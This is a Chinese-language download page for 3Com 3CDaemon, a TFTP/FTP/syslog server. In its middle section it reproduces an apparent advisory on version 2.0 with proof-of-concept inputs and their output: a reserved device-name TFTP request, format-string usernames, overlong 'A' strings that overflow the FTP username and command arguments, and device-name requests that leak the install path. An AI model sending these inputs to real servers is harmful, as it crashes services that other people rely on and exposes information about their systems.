3COM 3CDaemon是一款易服務(wù)器工具,集成了TFTP、FTP和SYSLOG功能的多重服務(wù)器功能集成軟件,主要作用于服務(wù)器中,同時(shí)還能夠幫助用戶改善相關(guān)的電腦功能,有需要的朋友可以通過(guò)winwin7分享的地址來(lái)獲取哦!
3COM 3CDaemon軟件簡(jiǎn)介
3com的這款東西還是很有名很不錯(cuò)滴~~~3CDaemon是一款免費(fèi)的集成了TFTP、FTP和SYSLOG功能的應(yīng)用程序;作用于FTP,TFTP,SYSLOG服務(wù)器,TFTP客戶端,雖然還存在很多的問(wèn)題,但是使用起來(lái)還是不錯(cuò)的!
3COM 3CDaemon問(wèn)題詳解
1、TFTP保留設(shè)備名拒絕服務(wù)攻擊
提交類似如下的請(qǐng)求,可導(dǎo)致TFTP服務(wù)程序掛起:
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".
2、FTP用戶名存在格式串問(wèn)題
提交包含格式串字符作為用戶名數(shù)據(jù),可導(dǎo)致守護(hù)程序崩潰:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>
3、FTP超長(zhǎng)用戶名緩沖區(qū)溢出
由于對(duì)用戶名缺少正確邊界緩沖區(qū)檢查,提交超長(zhǎng)用戶名可導(dǎo)致緩沖區(qū)溢出:
D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.
4、多個(gè)FTP命令超長(zhǎng)參數(shù)緩沖區(qū)溢出
cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令對(duì)參數(shù)缺少充分邊界檢查,提交超長(zhǎng)字符串作為命令參數(shù)可導(dǎo)致緩沖區(qū)溢出:
ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>
ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
5、多個(gè)FTP命令存在格式串問(wèn)題
提交格式字符串作為參數(shù),可導(dǎo)致程序崩潰。
6、多個(gè)FTP命令包設(shè)備名信息泄露問(wèn)題
請(qǐng)求保留設(shè)備名可導(dǎo)致返回程序安裝路徑信息:
ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
受影響系統(tǒng):
3Com 3CDaemon 2.0 revision 10
使用教程
1.在本文中下載winwin7分享的3cdaemon最新版軟件包
2.解壓3cdaemon軟件,運(yùn)行“EXE.文件”;
3.雙擊打開,進(jìn)入3cdaemon軟件界面
有問(wèn)題按下F1查看幫助!
以上便是WinWin7小編給大家分享的TFTP軟件——3COM 3CDaemon綠色漢化版!
下一篇:猿題庫(kù)電腦版